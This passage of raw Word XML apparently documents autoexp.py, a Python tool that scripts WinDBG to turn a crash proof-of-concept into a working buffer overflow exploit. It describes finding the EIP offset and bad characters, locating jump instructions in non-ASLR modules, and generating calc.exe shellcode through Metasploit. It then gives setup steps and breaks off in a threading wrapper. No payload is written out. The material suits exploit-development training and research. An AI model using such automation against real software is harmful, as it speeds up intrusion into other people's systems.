            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc462491417 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="29E7427B" w14:textId="77777777" w:rsidR="00EA3795" w:rsidRDefault="007A7A29">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9881"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc462491418" w:history="1">
            <w:r w:rsidR="00EA3795" w:rsidRPr="00D739A7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4 Saving the exploit</w:t>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc462491418 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="27EE41B3" w14:textId="77777777" w:rsidR="00EA3795" w:rsidRDefault="007A7A29">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9881"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc462491419" w:history="1">
            <w:r w:rsidR="00EA3795" w:rsidRPr="00D739A7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5 Running the autoexp.py script</w:t>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc462491419 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00EA3795">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="36E7B2C9" w14:textId="77777777" w:rsidR="00522848" w:rsidRDefault="00522848">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="71C29B5D" w14:textId="77777777" w:rsidR="00522848" w:rsidRDefault="00522848">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="005494" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="697F9F6C" w14:textId="7EC796CE" w:rsidR="00C77DB7" w:rsidRDefault="00E3087E" w:rsidP="00C77DB7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc462491407"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00C77DB7">
        <w:t>.0 Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="67229E42" w14:textId="361E4263" w:rsidR="00C77DB7" w:rsidRPr="00C77DB7" w:rsidRDefault="00C77DB7" w:rsidP="00C77DB7">
      <w:r>
        <w:t>This section gives a high lever overview of the tool, and the motivation behind creating it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B97E6B3" w14:textId="4B3D7DCC" w:rsidR="00C77DB7" w:rsidRDefault="00E3087E" w:rsidP="00C77DB7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc462491408"/>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00C77DB7">
        <w:t>.1 Motivation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="7223EC06" w14:textId="4C5CD642" w:rsidR="00C77DB7" w:rsidRPr="00C77DB7" w:rsidRDefault="00C77DB7" w:rsidP="002757BC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="002757BC">
        <w:t xml:space="preserve">he motivations behind creating this simple tool were to show how powerful is to script WinDBG and to simplify the typical BoF </w:t>
      </w:r>
      <w:r w:rsidR="00166880">
        <w:t xml:space="preserve">(buffer overflow) </w:t>
      </w:r>
      <w:r w:rsidR="002757BC">
        <w:t>exploit development process. As the method is basically the same every time, a lot of manual work can be saved with automating the process. There are plenty of helper scripts (far the best and well known is mona.py), but none of them does the entire job for you.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EBC39B" w14:textId="26C56753" w:rsidR="00C77DB7" w:rsidRDefault="00E3087E" w:rsidP="00C77DB7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc462491409"/>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00C77DB7">
        <w:t>.2 Typical BoF exploit writing steps</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="2217BC5D" w14:textId="147FE9C7" w:rsidR="00C77DB7" w:rsidRDefault="00C77DB7" w:rsidP="00C77DB7">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="002757BC">
        <w:t>he typical steps to create a BoF exploit are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E64B908" w14:textId="6B61C9D4" w:rsidR="002757BC" w:rsidRDefault="002757BC" w:rsidP="002757BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Find EIP overwrite location (offset in the buffer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791B59DE" w14:textId="670ECF07" w:rsidR="002757BC" w:rsidRDefault="002757BC" w:rsidP="002757BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Examine memory layout, registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2953A47E" w14:textId="4AFBC80C" w:rsidR="002757BC" w:rsidRDefault="002757BC" w:rsidP="002757BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Somehow jump to the buffer with the help of registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383654CB" w14:textId="4F75004B" w:rsidR="002757BC" w:rsidRDefault="002757BC" w:rsidP="002757BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Find bad characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4B28D1" w14:textId="116F0F2E" w:rsidR="002757BC" w:rsidRDefault="002757BC" w:rsidP="002757BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Generate shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286A63B5" w14:textId="56992C70" w:rsidR="002757BC" w:rsidRDefault="002757BC" w:rsidP="002757BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Put it all together</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA607E3" w14:textId="731DB589" w:rsidR="002757BC" w:rsidRPr="00C77DB7" w:rsidRDefault="002757BC" w:rsidP="002757BC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>These are the classic steps, and altough there are corner cases, most of them works this way. This is a heavily manual process especially the part, when you start the debugger, attach the process, run your PoC code, discover memory layout, or debug errors you made, and then start again. When it comes to discovering bad characters, that is especially time intense.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD0AA59" w14:textId="362560CA" w:rsidR="00C77DB7" w:rsidRDefault="00E3087E" w:rsidP="00C77DB7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc462491410"/>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00C77DB7">
        <w:t>.3 Overview of the tool</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="077D24C2" w14:textId="35D96EFE" w:rsidR="00B6623A" w:rsidRDefault="00B6623A" w:rsidP="00166880">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The goal with creating this script/tool was to automate as much as I can, so no manual interaction is needed to create a working exploit from </w:t>
      </w:r>
      <w:r w:rsidR="00166880">
        <w:t>a crash PoC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115A2DCC" w14:textId="77777777" w:rsidR="00166880" w:rsidRDefault="00166880" w:rsidP="00166880">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The script is written entirely in Python and uses the pykd library to intercat with WinDBG. The library is specific to this debugger, so others can’t be used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7183D82B" w14:textId="2F2648C5" w:rsidR="00166880" w:rsidRPr="00B6623A" w:rsidRDefault="00166880" w:rsidP="00166880">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>It is still in very early development stage, so there might be bugs, especially if interaction with the application is needed, and not all cases are covered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F7F4EC" w14:textId="1ACE882D" w:rsidR="00C77DB7" w:rsidRDefault="00E3087E" w:rsidP="00C77DB7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc462491411"/>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00C77DB7">
        <w:t>.3.1 What can the tool do as of today?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="7E23AC5D" w14:textId="77777777" w:rsidR="00421D00" w:rsidRDefault="00166880" w:rsidP="005A21D7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The tool currently can automate the process of creating classic BoF exploits from crash PoCs. The PoC has to be written in specific format (see later), so the script can interact with it, but if it’s done, it can do the job. </w:t>
      </w:r>
      <w:r w:rsidR="00421D00">
        <w:t>It will start the application, WinDBG, attach the process, etc...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B0CE50" w14:textId="6E933221" w:rsidR="005A21D7" w:rsidRDefault="00166880" w:rsidP="005A21D7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>As a first step it will run the crash PoC</w:t>
      </w:r>
      <w:r w:rsidR="006C6776">
        <w:t xml:space="preserve"> to determine the offset on the buffer, which overwrites EIP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidR="00C55D68">
        <w:t xml:space="preserve">then </w:t>
      </w:r>
      <w:r>
        <w:t>di</w:t>
      </w:r>
      <w:r w:rsidR="006C6776">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>cover the memory layout, how much space we have, which</w:t>
      </w:r>
      <w:r w:rsidR="00CB1173">
        <w:t xml:space="preserve"> registers points to the buffer.</w:t>
      </w:r>
      <w:r w:rsidR="006C6776">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C55D68">
        <w:t>Then it will start finding bad characters, which can’t be used in the exploit.</w:t>
      </w:r>
      <w:r w:rsidR="005A21D7">
        <w:t xml:space="preserve"> The next step is to find out how to jump to the actual buffer with the help of registers identified before, it will try to find various assembly instructions in memory, which can do this for us. If needed we can tell the tool to search only non-ASLR enabled modules, so essentially it can also bypass ASLR with this method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B2F27C" w14:textId="5DB86FDF" w:rsidR="005A21D7" w:rsidRDefault="005A21D7" w:rsidP="005A21D7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Once all of these are done, it will call metasploit to generate a calc.exe shellcode, and put the entire buffer together, and launch a working exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400D6A6B" w14:textId="6EBB9F7B" w:rsidR="005A21D7" w:rsidRDefault="005A21D7" w:rsidP="005A21D7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>I differentiated two types of applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A8B886" w14:textId="5842AA6D" w:rsidR="005A21D7" w:rsidRDefault="005A21D7" w:rsidP="005A21D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Network communication based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE2115E" w14:textId="63DB9A42" w:rsidR="005A21D7" w:rsidRDefault="005A21D7" w:rsidP="005A21D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>File based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECE1A81" w14:textId="4EE8A827" w:rsidR="005A21D7" w:rsidRDefault="005A21D7" w:rsidP="005A21D7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>In the 2nd case the file with the exploit has to be generated first, before launching the application, the tool can cover both types.</w:t>
      </w:r>
      <w:bookmarkStart w:id="5" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="76AFBCBD" w14:textId="7789FFDD" w:rsidR="008C7EC2" w:rsidRDefault="008C7EC2">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="65628E4F" w14:textId="7985AF69" w:rsidR="00E3087E" w:rsidRDefault="00E3087E" w:rsidP="00E3087E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc462491412"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2.0 Setting up the environment</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="10FA5BF9" w14:textId="77777777" w:rsidR="00E3087E" w:rsidRDefault="00E3087E" w:rsidP="00E3087E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Install Debugger Tools for Windows from </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="002E2AA5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://msdn.microsoft.com/en-US/windows/hardware/hh852363</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6FA708D1" w14:textId="77777777" w:rsidR="00E3087E" w:rsidRDefault="00E3087E" w:rsidP="00E3087E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Install an older version of Python (e.g.: 2.7.3), download from: </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="002E2AA5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.python.org/downloads/windows/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="760A1DF4" w14:textId="77777777" w:rsidR="00E3087E" w:rsidRDefault="00E3087E" w:rsidP="00E3087E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Download latest 3.x version of </w:t>
      </w:r>
      <w:r w:rsidRPr="003C43CC">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>pykd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="002E2AA5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://pykd.codeplex.com/releases/view/614442</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7D2C065C" w14:textId="77777777" w:rsidR="00E3087E" w:rsidRDefault="00E3087E" w:rsidP="00E3087E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Extract the zip file contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFCE6D8" w14:textId="77777777" w:rsidR="00E3087E" w:rsidRDefault="00E3087E" w:rsidP="00E3087E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Copy the pykd.pyd file to "</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB2DFF">
        <w:t>C:\Program Files (x86)\Windows Kits\8.0\Debuggers\x86</w:t>
      </w:r>
      <w:r>
        <w:t>\winext"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D30A3D8" w14:textId="6514C115" w:rsidR="00E3087E" w:rsidRDefault="00E3087E" w:rsidP="00E3087E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc462491413"/>
      <w:r>
        <w:t>2.1 Verify Installation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="3E0A51DD" w14:textId="77777777" w:rsidR="00E3087E" w:rsidRDefault="00E3087E" w:rsidP="00E3087E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Launch a custom x86 application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF34E33" w14:textId="77777777" w:rsidR="00E3087E" w:rsidRDefault="00E3087E" w:rsidP="00E3087E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Attach the debugger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0BB5E0" w14:textId="77777777" w:rsidR="00E3087E" w:rsidRDefault="00E3087E" w:rsidP="00E3087E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Type: "</w:t>
      </w:r>
      <w:r w:rsidRPr="003C43CC">
        <w:t>.load pykd.pyd</w:t>
      </w:r>
      <w:r>
        <w:t>", you shouldn’t get any errors showing up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154D0075" w14:textId="77777777" w:rsidR="00E3087E" w:rsidRDefault="00E3087E" w:rsidP="00E3087E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>In case WinDBG terminates, try an older version of Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4617572E" w14:textId="77777777" w:rsidR="00E3087E" w:rsidRDefault="00E3087E" w:rsidP="00E3087E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Type "r" to get the values stored in registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08784EEA" w14:textId="77777777" w:rsidR="00E3087E" w:rsidRDefault="00E3087E" w:rsidP="00E3087E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Start Python in WinDBG, type: "!py"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A781A43" w14:textId="77777777" w:rsidR="00E3087E" w:rsidRDefault="00E3087E" w:rsidP="00E3087E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Type: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00522848">
        <w:t>hex(reg('eip'))</w:t>
      </w:r>
      <w:r>
        <w:t>", you should get the same value for EIP, what you saw at step #4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C94391B" w14:textId="77777777" w:rsidR="00E3087E" w:rsidRDefault="00E3087E" w:rsidP="00E3087E"/>
    <w:p w14:paraId="0816BD80" w14:textId="14DEC1EF" w:rsidR="00074B3C" w:rsidRDefault="00074B3C">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="587BB429" w14:textId="3071AC79" w:rsidR="00C77DB7" w:rsidRDefault="00B22735" w:rsidP="00B22735">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc462491414"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.0 Using the autoexp.py script</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="015D1E2B" w14:textId="58F9C3A6" w:rsidR="00E3087E" w:rsidRDefault="00B22735" w:rsidP="00B22735">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc462491415"/>
      <w:r>
        <w:t xml:space="preserve">3.1 </w:t>
      </w:r>
      <w:r w:rsidR="00E3087E">
        <w:t xml:space="preserve">The exploit </w:t>
      </w:r>
      <w:r w:rsidR="00C41693">
        <w:t>file</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="41F01A6B" w14:textId="394463A7" w:rsidR="008E3474" w:rsidRDefault="00D31FEB" w:rsidP="008E3474">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>This class defines the exploit itself, and has functions to modify/interact with the exploit code during development.</w:t>
      </w:r>
      <w:r w:rsidR="008E3474">
        <w:t xml:space="preserve"> It has functions to modify the buffer, and get info from it. The class .py file has a wrapper function defintion, which will allow the exploit to run in asyn way:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332200A9" w14:textId="77777777" w:rsidR="008E3474" w:rsidRPr="000F60C1" w:rsidRDefault="008E3474" w:rsidP="000F60C1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="000F60C1">
        <w:t>def run_async(func):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8036B2" w14:textId="77777777" w:rsidR="008E3474" w:rsidRPr="000F60C1" w:rsidRDefault="008E3474" w:rsidP="000F60C1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="000F60C1">
        <w:tab/>
        <w:t>@wraps(func)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BF1A76" w14:textId="77777777" w:rsidR="008E3474" w:rsidRPr="000F60C1" w:rsidRDefault="008E3474" w:rsidP="000F60C1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="000F60C1">
        <w:tab/>
        <w:t>def async_func(*args, **kwargs):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35670BDE" w14:textId="77777777" w:rsidR="008E3474" w:rsidRPr="000F60C1" w:rsidRDefault="008E3474" w:rsidP="000F60C1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="000F60C1">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000F60C1">
        <w:tab/>
        <w:t>func_hl = Thread(target = func, args = args, kwargs = kwargs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3F05CF" w14:textId="77777777" w:rsidR="008E3474" w:rsidRPr="000F60C1" w:rsidRDefault="008E3474" w:rsidP="000F60C1">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="000F60C1">
        <w:tab/>
      </w:r>
